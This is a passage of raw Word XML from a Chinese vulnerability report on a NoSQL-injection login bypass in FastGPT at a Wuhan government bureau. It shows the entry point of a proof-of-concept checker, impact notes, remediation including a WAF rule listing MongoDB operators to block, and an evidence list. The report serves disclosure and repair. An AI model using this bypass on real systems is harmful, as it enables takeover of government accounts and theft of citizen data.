          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>def main():</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    p = argparse.ArgumentParser(description="CVE-2026-40351 FastGPT login NoSQLi checker")</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    p.add_argument("target", help="目标根地址")</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    p.add_argument("--user", default="root", help="尝试登录的用户名,默认 root")</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    p.add_argument("--proxy", help="代理,例如 http://127.0.0.1:7897")</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    args = p.parse_args()</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(json.dumps(check(args.target, args.user, proxy=args.proxy), ensure_ascii=False, indent=2))</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>if __name__ == "__main__":</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="宋体"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    main()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>六、危害说明（摘要）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>1. 任意互联网用户零门槛夺取政务系统最高权限：一次请求即可绕过认证以 root/Owner 登录，用户管理、应用配置、知识库、API 密钥全部落入攻击者控制，并可创建账号长期驻留；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. 政务公信力与钓鱼风险：攻击者可篡改 AI 问答知识库，以武汉市自然资源和规划局官方名义向公众输出伪造的办事指南或钓鱼内容；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. 数据泄露与攻击链：结合同系统已确认的未授权读取漏洞（getHistories NoSQL 注入，一次请求返回 45 条执法业务对话），构成「匿名窃取+权限接管」完整攻击链；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. 横向扩散：root 权限可读取系统内配置的模型 API 密钥与外部连接信息，用于冒用本局身份或渗透关联系统；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5. 合规后果：违反《网络安全法》第 21 条、《数据安全法》第 27 条及等保 2.0 要求，且该系统此前已被通报仍未修复，存在被上级通报问责风险。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>（完整论证见同目录《武汉自规局_FastGPT登录NoSQLi_危害说明.docx》）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>七、修复建议</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>1. 立即将 FastGPT 升级至 4.14.9.5 及以上版本，同步修复登录与聊天记录接口同类缺陷；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. 修复前临时关闭公网访问或加来源白名单，恢复并正确配置 HTTPS，杜绝明文传输；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. 服务端对登录接口强制参数类型校验（password 必须为非空字符串），WAF 层拦截含 $ne/$gt/$regex/$where 等 MongoDB 操作符的请求体；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. 排查历史登录与访问日志，修改 root 及全部管理员口令，轮换全部 API 密钥；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5. 如发现数据已被读取或篡改，按政务数据安全事件流程处置并上报。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="黑体"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>八、证据附件清单</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>1. 本复现过程文档（含截图 3 张：验证脚本启动、注入请求与判定、root/Owner 登录成功）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2. 利用过程完整录屏 evidence/QQ20261012-174726-HD.mp4（2026-10-12 录制）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3. 请求响应原始报文 evidence/请求响应包.txt（含负面对照组）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4. POC 源码 poc/check_cve_2026_40351.py 及脱敏输出 evidence/验证输出_脱敏.txt；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5. 复测记录 evidence/复测记录_20261012.md（三操作符对照）；</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>6. 《武汉自规局_FastGPT登录NoSQLi_危害说明.docx》。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>验证过程仅执行只读登录验证与权限字段读取，未读取业务数据内容，未做任何写入或破坏性操作。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